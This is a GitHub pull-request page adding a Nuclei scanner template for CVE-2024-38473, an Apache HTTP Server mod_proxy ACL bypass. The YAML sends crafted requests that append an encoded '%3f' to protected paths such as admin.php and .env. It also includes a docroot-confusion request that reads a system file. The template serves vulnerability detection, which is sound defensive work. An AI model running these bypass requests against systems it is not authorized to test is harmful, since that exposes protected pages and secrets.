Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added template for CVE-2024-38473 #10634

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
86 changes: 86 additions & 0 deletions http/cves/2024/CVE-2024-38473.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,86 @@
id: CVE-2024-38473

info:
name: Apache HTTP Server - ACL Bypass
author: pdteam
severity: high
description: |
Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
remediation: |
Fixed in v2.4.60
reference:
- https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
- https://www.cvedetails.com/cve/CVE-2024-38473/
- https://nvd.nist.gov/vuln/detail/CVE-2024-38473
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://security.netapp.com/advisory/ntap-20240712-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
cvss-score: 8.1
cve-id: CVE-2024-38473
cwe-id: CWE-116
epss-score: 0.00043
epss-percentile: 0.09569
cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
metadata:
max-request: 10
vendor: Apache Software Foundation
product: Apache HTTP Server
google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm

flow: |
http(1) && http(2)
http(3)

http:
# Path normalization ACL bypass
- method: GET
path:
- "{{BaseURL}}/{{files}}"

payloads:
files:
- admin.php
- adminer.php
- xmlrpc.php
- .env
- admin.php
- php-info.php
- php_info.php
- phpinfo.php
- info.php
- adminer.php
- xmlrpc.php
- bin/cron.php
- cache/index.tpl.php
- cpanel.php

stop-at-first-match: true
matchers:
- type: status
status:
- 403
- 401
internal: true

- method: GET
path:
- "{{BaseURL}}/{{http_1_files}}%3ftest.php"

matchers:
- type: status
status:
- 200

# docroot confusion
- method: GET
path:
- "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"

matchers:
- type: word
words:
- "On Debian systems, the complete text of the GNU General Public License"
- "This package was written by Peter Tobias"
condition: and
Loading